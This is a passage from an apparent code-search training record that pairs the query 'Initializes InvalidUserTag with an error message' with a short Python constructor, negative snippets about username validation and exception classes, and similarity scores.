ERR_MSG1)\n\t\tself.assertEqual(err2.text, ERR_MSG2)", "def __init__(self, f_name, l_name, age, birthplace):\n self.f_name = f_name\n self.l_name = l_name\n self.age = age\n self.birthplace = birthplace\n self.login_attempts = 0", "def testBadNames(self):\n bad_dataset = self.badstr\n bad_table = self.badstr * 2\n # Ignore access to protected members\n # pylint: disable=W0212\n\n self.assertRaises(DOLAPI._DOLAPIError,\n self.auth.table,\n bad_dataset,\n self.table)\n\n self.assertRaises(DOLAPI._DOLAPIError,\n self.auth.table,\n self.dataset,\n bad_table)\n\n self.assertRaises(DOLAPI._DOLAPIError,\n self.auth.table,\n bad_dataset,\n bad_table)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)", "def __init__(self, name: str):\n self.name = name", "def setErrorMessage(self, errorMessage):\n self._errorMessage = errorMessage", "def __init__(__self__, *,\n error_code: pulumi.Input[Union[str, 'CopyCompletionErrorReason']],\n error_message: pulumi.Input[str]):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)", "def test_bad_names(self):\n self.do_test_bad_name('', 'tmp/frog')\n self.do_test_bad_name('.b', 'tmp/frog')\n self.do_test_bad_name('a b', 'tmp/frog') # FAILS\n self.do_test_bad_name('a-b', 'tmp/frog') # FAILS", "def _syntax_error(msg):\n try:\n filename = stream.name\n except AttributeError:\n filename = None\n return RFC822SyntaxError(filename, lineno, msg)", "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def __init__(self, source, category, name, message, **kwargs):\n super().__init__(source, category, name, message, **kwargs)\n if \"exception\" not in kwargs:\n self._parse_traceback()", "def check_name(self, name, bots_path):\n if not os.path.exists(bots_path + name):\n raise ValueError(\"Could not find bot '{bot}'\".format(bot=bots_path + name))\n else:\n self.name = name\n self.path = bots_path + name + os.sep" ]
[ "0.6010401", "0.5765059", "0.54735583", "0.544012", "0.54245514", "0.54195553", "0.5391037", "0.5378705", "0.53236824", "0.53205895", "0.5272788", "0.52640235", "0.524458", "0.52370137", "0.5229564", "0.5201824", "0.5157976", "0.51524526", "0.51459634", "0.51440966", "0.5142513", "0.5109591", "0.5108444", "0.51044416", "0.5102282", "0.51000834", "0.5099943", "0.504855", "0.5032683", "0.5029346", "0.5022238", "0.5018278", "0.49908465", "0.49883562", "0.49794406", "0.49749535", "0.49532777", "0.49400982", "0.49396795", "0.4927477", "0.49229425", "0.49214262", "0.49188697", "0.49075252", "0.4904022", "0.4901415", "0.48745087", "0.4865619", "0.4864891", "0.48586193", "0.4850401", "0.48489898", "0.48476338", "0.4827589", "0.48265338", "0.48203704", "0.48125485", "0.4806988", "0.4806873", "0.47914013", "0.47867832", "0.47778952", "0.47671413", "0.47601417", "0.47597983", "0.47597983", "0.47507536", "0.47453856", "0.47445342", "0.47407794", "0.4739168", "0.47380134", "0.47375387", "0.4731605", "0.47301263", "0.4724325", "0.47221908", "0.47200483", "0.47186074", "0.47177687", "0.47163135", "0.4712953", "0.47106057", "0.47084835", "0.47068122", "0.47042897", "0.4704128", "0.4701961", "0.4701961", "0.4701961", "0.4701961", "0.4701961", "0.4701961", "0.46983272", "0.46977568", "0.46881557", "0.46827653", "0.4680754", "0.4678685", "0.46756208", "0.4675543" ]
0.0
-1
Initializes InvalidUsername with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, username: str) -> None:\n try:\n check_string(username, 'username', 'a-z0-9', 100)\n except IllegalParameterError as e:\n raise IllegalUsernameError(e.message) from e\n self.name = username", "def username_error(self, msg):\n raise NotImplementedError('username_error')", "def get_username_validation_error(username):\n return _validate(_validate_username, errors.AccountUsernameInvalid, username)", "def username_error(self, msg):\n print('\\nusername error: %s' % msg, file=self.console)\n self.username = input('Username: ')", "def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n # if user is not None\n raise ValidationError('That username is taken. Please choose a different one.')", "def test_empty_username():\n expect_error(register, InputError, \"\", \"abcdef\", \"A\", \"A\", \"A\")", "def validate_username(self, username):\n user = User.query.filter_by(username=username.data).first()\n if user:\n raise ValidationError('That username already exists. Please choose another username.')", "def username(self, username) :\n\t\ttry :\n\t\t\tself._username = username\n\t\texcept Exception as e:\n\t\t\traise e", "def validate_username(self, username):\n if username.data != current_user.username:\n user = User.query.filter_by(username=username.data).first()\n if user:\n raise ValidationError('That username already exists. Please choose another username.')", "def test_username_not_unique(bot):\n expect_error(register, InputError, bot.username, \"abcdef\", \"a\", \"a\", \"a\")", "def get_username_existence_validation_error(username, api_version='v1'):\n return _validate(_validate_username_doesnt_exist, errors.AccountUsernameAlreadyExists, username, api_version)", "def test_username_nodigits(self):\n response = self.signup_a_user(self.username_nodigits)\n self.assertEqual(response.data['errors']['username'],\n [\"username is invalid\"]\n )\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def validate_username(username):\r\n\r\n\t\tmin_username_length = 3\r\n\t\tstats = 'valid'\r\n\r\n\t\tif len(username) < min_username_length:\r\n\t\t\tstats = 'invalid'\r\n\t\telif re.match(\"^[a-zA-Z0-9_-]+$\", username) is None:\r\n\t\t\tstats = 'invalid'\r\n\t\telse:\r\n\t\t\tuser = AuthTools.get_user_by_username(username)\r\n\r\n\t\t\tif user is not None:\r\n\t\t\t\tstats = 'taken'\r\n\r\n\t\treturn stats", "def validate_username(self, username_field):\n if User.get_by_username(username_field.data):\n raise ValidationError('This username is already taken.')", "def validate_username(self, username_field):\n\n if User.query.filter_by(username=username_field.data).first():\n raise ValidationError(\"This username is already taken.\")", "def test_user_cannot_register_with_invalid_username(self):\n response = self.client.post(SIGNUP_URL,\n data=json.dumps(\n {'username': '#_danny', 'email': 'danny@gmail.com', 'password': 'pass12345'}),\n content_type='application/json')\n self.assertEqual(response.status_code, 400)\n result = json.loads(response.data.decode())\n self.assertEqual(result[\"message\"], \"Invalid username\")", "def validate_username(self, field):\n if User.query.filter_by(username=field.data).first():\n raise ValidationError(\"Username already in use.\")", "def test_auth_user_fail_bad_username(self):\n\n self.assertFalse(User.authenticate(\"invalid\", \"allison\"))", "def clean_username(self):\n username = self.cleaned_data['username']\n\n try:\n User.objects.get(username=username)\n except 
ObjectDoesNotExist:\n return username\n\n raise forms.ValidationError('Login is already in use.')", "def clean_username(self):\r\n try:\r\n user = User.objects.get(username__iexact=self.cleaned_data['username'])\r\n except User.DoesNotExist:\r\n return self.cleaned_data['username']\r\n raise forms.ValidationError(_(u'This username is already taken. Please choose another.'))", "def username_validation(username):\n errors = []\n #Check if Username exists\n if(username_present(username)):\n errors.append(\"Användarnamnet finns redan.\")\n #Username needs to be longer then 3 chars\n if(len(username) <= 3):\n errors.append(\"Användarnamnet mäste vara 3 tecken eller längre.\")\n\n return errors", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def username_format(self, username_format):\n\n self._username_format = username_format", "def validateUsername(username):\n\n if not(username):\n return \"You must specify your archive.org username.\"", "def validate_username(username):\n if not username or not isinstance(username, str) or len(username) > 80:\n return {'error': 'invalid username: %s (%s), valid value string 1 to 80 characters, mandatory' % (username, pythonTypeToJSONType(username))}\n q = User.query.filter_by(username = username).first()\n if q:\n return {'error': 'username %s is in use' % username}\n else:\n return None", "def clean_username(self):\n username = self.cleaned_data['username']\n\n try:\n User.objects.get(email=username)\n except ObjectDoesNotExist:\n raise forms.ValidationError('Selected user does not exist.')\n\n return username", "def clean_username(self):\n username = self.cleaned_data['username']\n if User.objects.filter(username=username):\n raise forms.ValidationError('Nombre de usuario ya registrado.')\n return username", "def clean_username(self):\n username = self.cleaned_data['username']\n if User.objects.filter(username=username):\n raise forms.ValidationError('Nombre de usuario ya registrado.')\n return username", "def _validate_username_doesnt_exist(username, api_version='v1'):\n if api_version == 'v1':\n error_message = accounts.USERNAME_CONFLICT_MSG.format(username=username)\n else:\n error_message = accounts.AUTHN_USERNAME_CONFLICT_MSG\n if username is not None and username_exists_or_retired(username):\n raise errors.AccountUsernameAlreadyExists(_(error_message)) # lint-amnesty, pylint: disable=translation-of-non-string", "def test_sees_error_message_if_username_doesnt_exist(self):\n response = self.app.post(\n \"/api/users/login\",\n data=json.dumps(\n dict(\n email=USER_DATA[\"email\"] + \"x\",\n password=USER_DATA[\"credential1\"],\n )\n ),\n content_type=\"application/json\",\n follow_redirects=True,\n )\n res = response.data.decode(\"ASCII\")\n res = json.loads(res)\n self.assertEqual(response.status_code, 401)\n self.assertEqual(\n res[\"message\"], \"Invalid email, Please try again\"\n )", "def validate_username(form, field):\n\n user = User.query.filter_by(username=form.username.data).first()\n\n if user and not user == g.user:\n form.username.errors = [\n \"Username 
already taken!\",\n *form.username.errors\n ]\n raise ValidationError", "def __init__(self, username):\n log.info(\"Initialising user \" + username)\n self.__username = username\n self.__passwd_change_token = ''\n self.__request_header = {'content-type': 'application/json'}", "def test_invalid_username():\n expect_error(edit, InputError, \"aaa\", 1, True, None, None)", "def clean_username(self):\n username = self.cleaned_data.get(\"username\")\n if User.objects.filter(username=username).exists():\n LOGGER.warning(\"username already exists\", username=username)\n raise ValidationError(_(\"Username already exists\"))\n return username", "def validate_username(self, value):\n if UserAPIModel.objects.filter(username=value).count() > 0:\n raise serializers.ValidationError('Username taken')\n return value", "def validate_username(self, value):\n if UserAPIModel.objects.filter(username=value).count() > 0:\n raise serializers.ValidationError('Username taken')\n return value", "def clean_username(self):\n\t\tusername = self.cleaned_data['username']\n\t\tif User.objects.filter(username=username):\n\t\t\traise forms.ValidationError('username de usuario ya registrado.')\n\t\treturn username", "def unique_username(cls, username):\n if not User.is_username_available(username):\n raise ValueError('Sorry, this username is already taken.')\n return username", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def clean_username(self):\n username = self.cleaned_data.get(\"username\")\n if username.lower() != slugify(username).lower():\n raise forms.ValidationError(\n ugettext(\"Username can only contain letters, numbers, dashes \"\n \"or underscores.\"))\n lookup = {\"username__iexact\": username}\n try:\n User.objects.exclude(id=self.instance.id).get(**lookup)\n except User.DoesNotExist:\n return username\n raise forms.ValidationError(\n ugettext(\"This username is already registered\"))", "def clean_username(self):\n username = self.cleaned_data.get('username')\n user_exists = User.objects.filter(username=username).exists()\n\n if user_exists:\n raise forms.ValidationError(\n 'El usuario ya existe en nuestros registros.'\n )\n\n return username", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def clean_username(self):\r\n username = self.cleaned_data.get(\"username\")\r\n\r\n if not username: \r\n return username\r\n\r\n \r\n if User.objects.filter(username__iexact=username).exclude(pk=self.instance.pk):\r\n raise forms.ValidationError(\"That username is already used.\")\r\n else:\r\n return username", "def test_admin_cannot_create_user_with_invalid_username(self):\n resp = self.admin_register()\n reply = self.admin_login()\n token = reply['token']\n user = dict(\n name='Summer Love',\n username='love summer',\n password='Andela8',\n role='attendant'\n )\n\n resp = self.client.post(\n '/api/v1/users',\n content_type='application/json',\n data=json.dumps(user),\n headers={'Authorization': 'Bearer {}'.format(token)}\n )\n\n reply = json.loads(resp.data.decode())\n\n self.assertEqual(reply['message'], 'Enter username in a correct string format no spaces, (johndoe)!')\n self.assertEqual(resp.status_code, 400)", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n 
{self.message}')", "def is_allowed_username(username):\n if not is_filled_username(username):\n return \"Username is a required field.\"\n elif not is_regex_username(username):\n return \"Username must be 3-20 characters, using letters or numbers.\"\n elif is_numeric_username(username):\n return \"Username must contain at least one letter.\"\n elif exists_username(username):\n return \"Username already in use.\"\n else:\n return \"\"", "def username(self, username: str):\n\n self._username = username", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def clean_username(self):\n data = self.cleaned_data['username']\n if '@' in data or '|' in data or ' ' in data or '+' in data:\n raise forms.ValidationError(_(u'Usernames should not have special characters.'))\n try:\n user = User.objects.get(username__exact=self.cleaned_data['username'])\n except User.DoesNotExist:\n return self.cleaned_data['username']\n raise forms.ValidationError(_(u'This username is already taken. Please choose another.'))", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def validate_username(form, field):\n if User.query.filter_by(username=form.username.data).first():\n form.username.errors.append(\"Username already taken!\")\n raise ValidationError", "def check_username(username):\n\n try:\n message = (\n 'Validating submitted username.'\n )\n logger.info(message)\n invalid = (\n not username.isalnum()\n )\n if invalid:\n raise PlantalyticsDataException(USER_INVALID)\n exists = cassy.check_username_exists(username)\n if exists:\n raise PlantalyticsDataException(USER_TAKEN)\n message = (\n 'Submitted username successfully validated.'\n )\n logger.info(message)\n except PlantalyticsException as e:\n raise e\n except Exception as e:\n raise e", "def validate_username(request):\r\n # get submitted username.\r\n username = request.GET.get('username', None)\r\n if request.user.username:\r\n # check if an account with this username already exists, in case of editing user's profile.\r\n is_username_taken = User.objects.filter(username__iexact=username).exclude(username__iexact=request.user.username).exists()\r\n else:\r\n # check if an account with this username already exists, in case of registering new user.\r\n is_username_taken = User.objects.filter(username__iexact=username).exists()\r\n data = {'is_username_taken':is_username_taken}\r\n if data['is_username_taken']:\r\n data['error_message'] = 'An account with this Username already exists.'\r\n return JsonResponse(data)", "def __init__(self, username):\n self.username = username", "def test_authenticate_just_username(self):\n \n self.assertRaises(\n ValueError, \n self.authenticator.authenticate, \n username=u'thruflo'\n )", "def clean_username(self):\n username = self.cleaned_data['username']\n # Lo que hace es buscar los usarios que tengan ese username,\n # devuelve un True o False gracias al metodo *.exists()*\n username_taken = User.objects.filter(username=username).exists()\n \n if username_taken:\n # Ya Django sube la excepción hasta el nivel del HTML\n raise forms.ValidationError('Username is already in use.')\n return username", "def test_user_signup_with_invalid_first_name(self):\n pass", 
"def clean_username(self):\n if self.edit_user is None:\n # checks for alnum and that this user doesn't already exist\n return super(RegisterUserForm, self).clean_username()\n # just checks for alnum\n if not self.cleaned_data['username'].isalnum():\n raise forms.ValidationError(_(u'Please enter a username containing only letters and numbers.'))\n return self.cleaned_data['username']", "def validate_username(test_string: str) -> bool:\n if USERNAME_REGEX.match(test_string) is not None:\n return True\n session[\"last_error\"] = \"That's not a valid username.\"\n return False", "def test_register_user_with_invalid_username(self):\n login = self.client.post(\"api/v2/login\",content_type = 'application/json',data = json.dumps(self.admin_login))\n created_token = json.loads(login.data.decode())[\"token\"]\n new_user = self.client.post('/api/v2/signup',data = json.dumps(self.register_user_with_invalid_username),content_type = 'application/json',headers =dict(Authorization = \"Bearer{}\".format(created_token))) \n result = json.loads(new_user.data.decode())\n self.assertEqual(result ['message'], \"username must be a string\")\n self.assertEqual(new_user.status_code, 400)", "def check_auth_none(self, username):\n return AUTH_FAILED", "def test_user_cannot_register_with_short_username(self):\n response = self.client.post(SIGNUP_URL,\n data=json.dumps(\n {'username': 'dan', 'email': 'oti@gmail.com', 'password': 'pass12345'}),\n content_type='application/json')\n self.assertEqual(response.status_code, 400)\n result = json.loads(response.data.decode())\n self.assertEqual(result[\"message\"],\n \"Username should be atleast 4 characters\")", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def test_create_user_invalid_username(self):\r\n print(\"Create user invalid username (already taken)\")\r\n u_id = 3\r\n username = \"100\"\r\n password = \"test9999\"\r\n u_type = 1\r\n\r\n prev_noUsers = len(User.query.all())\r\n self.assertEqual(self.system.create_user(u_id, username, password, u_type), 0)\r\n curr_noUsers = len(User.query.all())\r\n self.assertEqual(prev_noUsers, curr_noUsers)", "def clean_username(self):\n existing = UserModel().objects.filter(username__iexact=self.cleaned_data['username'])\n if existing.exists():\n raise forms.ValidationError(_(\"A user with that username already exists.\"))\n else:\n return self.cleaned_data['username']", "def clean_username(self):\n existing = User.objects.filter(username__iexact=self.cleaned_data['username'])\n if existing.exists():\n raise forms.ValidationError(_(\"This username is already taken.\"))\n else:\n return self.cleaned_data['username']", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def test_register_with_invalid_username(self):\n self.response = self.client.post(\n \"/api/users/\",\n {\"user\": {\n \"username\": \"&*@#$\",\n \"email\": 'kakecom@gmail.com',\n \"password\": \"irquoa12345678\",\n }\n },\n format=\"json\"\n )\n self.assertEqual(self.response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual('Invalid Username , it contains invalid characters.',\n self.response.json()['errors']['error'][0])", "def username(self, username):\n self._username = username\n return self", "def __init__(\n self,\n first_name,\n last_name,\n username,\n age,\n location):\n self.first_name = first_name\n self.last_name = last_name\n self.username = username\n self.age = age\n 
self.location = location\n self.login_attempts = 0", "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def test_incomplete_user_exception(self):\n u_username_only = User(username=\"incomplete_user\")\n with self.assertRaises(TypeError) as err:\n User.signup(u_username_only)", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def username(self, username):\n\n self._username = username", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def test_user_empty_username(self):\n data = json.dumps({\n \"username\" : \"\", \"email\" : \"emptyusername@gmail.com\",\n \"password\" : \"12345678\", \"confirm_password\" : \"12345678\"})\n response = self.app.post(\n '/api/v3/users', data=data,\n content_type='application/json',\n headers=self.admin_header)\n self.assertEqual(response.status_code, 400)", "def test_signup_missing_username(self):\n\n invalid_u = User.signup(\"test@test.com\", None, \"testpass\", \"Test\", \"User\", None)\n \n uid = 99999\n invalid_u.id = uid\n\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()", "def check_user(msg):\n if \"Error\" in msg:\n raise ValueError('User already exists.')", "def test_login_form_username_length():\n creds = {\"username\": \"test\"}\n form = LoginForm(data=creds)\n\n assert not form.is_valid()\n assert form.errors[\"username\"] == [\n \"Ensure this value has at least 5 characters (it has 4).\"\n ]\n\n creds = {\"username\": \"tests\"}\n form = LoginForm(data=creds)\n\n assert not form.is_valid()\n assert form.errors.get(\"username\") == None", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def test_create_no_username(self):\n\n # If there is no username, email will be used instead\n properties = self.portal.portal_properties.site_properties\n properties.manage_changeProperties(use_email_as_login=True)\n\n user = api.user.create(\n email='chuck@norris.org',\n password='secret'\n )\n\n self.assertEquals(user.getUserName(), 'chuck@norris.org')\n\n # But if using emails as a username is disabled, we should get\n # an error\n properties.manage_changeProperties(use_email_as_login=False)\n\n self.assertRaises(\n ValueError,\n api.user.create,\n email='chuck@norris.org', password='secret'\n )", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def test_long_username():\n expect_error(register, InputError,\n \"a\" * (MAX_USERNAME + 1), \"abcdef\", \"a\", \"a\", \"a\")", "def test_registeration_no_username(self):\n response = self.signup_a_user(self.user_lacks_username)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertNotIn(\"token\", response.data)", "def test_unique_username(self):\n user = User(name=\"thealphadollar\")\n g.db.add(user)\n g.db.commit()\n\n user_field = Field(\"thealphadollar\")\n\n with 
self.assertRaises(ValidationError):\n unique_username(None, user_field)", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def test_email_username_validator(self):\n # Test with good data\n validator = self.validator.username_email_validator\n resp = validator('moracha', 'moracha@gmail.com',\n mock_data['user_dets'])\n self.assertTrue(resp)\n # Test with bad data\n # Registered username\n resp = validator(mock_data['reg_usernm'],\n 'moracha@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username already taken\")\n # Registered email\n resp = validator(\n 'moracha', mock_data['reg_email'], mock_data['user_dets'])\n self.assertEqual(resp, \"Email already used to register\")\n # invalid email\n resp = validator(\n 'moracha', mock_data['bad_email'], mock_data['user_dets'])\n self.assertEqual(resp, \"Email invalid\")\n # username less than four characters\n resp = validator('moa', 'josh@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username cannot be less than four characters\")\n # username with characters\n resp = validator(mock_data['space_usnm'],\n 'josh@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username cannot have spaces\")\n # username starting with number\n resp = validator('5mvdfg', 'josh@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username must start with a letter\")\n # Username with wrong characters\n resp = validator('gtftas%$', 'josh@gmail.com', mock_data['user_dets'])\n self.assertEqual(resp, \"Username cannot have this characters: @*#%!&$\")", "def api_auth_validate_username():\n form = request.get_json(force=True)\n if \"username\" not in form:\n raise \"username is required\"\n return jsonify(\n userProvider.validate_username(\n form['username'].encode('utf8')\n )\n )", "def username_not(self, username_not):\n\n self._username_not = username_not", "def username_not(self, username_not):\n\n self._username_not = username_not", "def test_valid_username(self):\n self.valid_username = {'user': {\n \"username\": \"1@1#%^()+\",\n \"email\": \"remmytest.com\",\n \"password\": \"Password123\"\n }}\n\n response = self.client.post(\n self.reg_url,\n self.valid_username,\n format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIn(b\"can only contain letters, numbers, -, _\",\n response.content)", "def testAddEmptyUsername(self):\n self.assertEquals(models.ERR_BAD_USERNAME, self.users.add(\"\", \"password\"))", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)" ]
[ "0.7104705", "0.6829881", "0.6761184", "0.6483541", "0.6251707", "0.6137439", "0.60849506", "0.6066154", "0.60328996", "0.60174", "0.5974511", "0.59486985", "0.59322745", "0.59095454", "0.5881767", "0.5851913", "0.58311576", "0.5790885", "0.5769815", "0.57687426", "0.57497245", "0.5744424", "0.5712758", "0.5700058", "0.56841946", "0.56777173", "0.56563014", "0.56563014", "0.5650253", "0.5641551", "0.5640195", "0.56298876", "0.56115496", "0.5605819", "0.5599938", "0.5599938", "0.5580361", "0.55785245", "0.5561871", "0.55469126", "0.5528389", "0.5518515", "0.55132747", "0.55101526", "0.5507707", "0.5487107", "0.54831547", "0.54806966", "0.5475938", "0.546315", "0.5462696", "0.5456079", "0.5447813", "0.5436663", "0.539663", "0.5381751", "0.53736395", "0.5371608", "0.5367421", "0.5337491", "0.5337292", "0.5334696", "0.53300405", "0.5327275", "0.5310032", "0.53061116", "0.53040034", "0.52788675", "0.52788496", "0.52753204", "0.52698284", "0.5264572", "0.525887", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.52585316", "0.5258146", "0.5258141", "0.52571297", "0.52547735", "0.52542603", "0.52448565", "0.52289563", "0.52262574", "0.52262473", "0.521259", "0.5209038", "0.5207206", "0.52067834", "0.52062374", "0.52011985", "0.52011985", "0.51964784", "0.5195797", "0.51923656" ]
0.0
-1
Initializes InvalidUserTag with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def error(tag, message=None):\n Log._post(\"error\", tag, message)", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def __init__(self, message, text=None, reference=None, contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def validate_tag(self, tag_field):\n if not tag_field.data or tag_field.data == '':\n raise ValidationError('All users must be tagged')\n return True", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def username_error(self, msg):\n raise NotImplementedError('username_error')", "def test_parse_tags_invalid(self):\n tagstring = \"tag1, tag2, tag3!\"\n\n with self.assertRaisesRegexp(Exception, \"invalid tag 'tag3!': only numbers, letters, and commas are \"\n \"allowed in tags\"):\n api.parse_tags(tagstring)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def on_init_fail(self, event_time, message):\n pass", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, 
params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(\n self, created_at, started_at=None, stopped_at=None, messages=None\n ):\n super(StateError, self).__init__(\n type_id=STATE_ERROR,\n created_at=created_at\n )\n self.started_at = started_at if started_at is not None else created_at\n self.stopped_at = stopped_at if stopped_at is not None else utc_now()\n self.messages = messages if messages is not None else list()", "def test_user_register_bad_request(self):\n response = self.client.post(\n CONSTS.USER_REGISTER_URL,\n data=self.invalid_user_data,\n format='json'\n )\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def test_create_tag_invalid(self):\n tag_data = {'name': ''}\n res = self.client.post(TAGS_URL, data=tag_data)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def error_message(self, error_message):\n\n self._error_message = error_message", "def validate_tag(tag=None):\n if not tag:\n raise AttributeError('Tag cannot be empty')\n\n if tag not in TAGS:\n raise ValueError('{0} tag is not supported')", "def 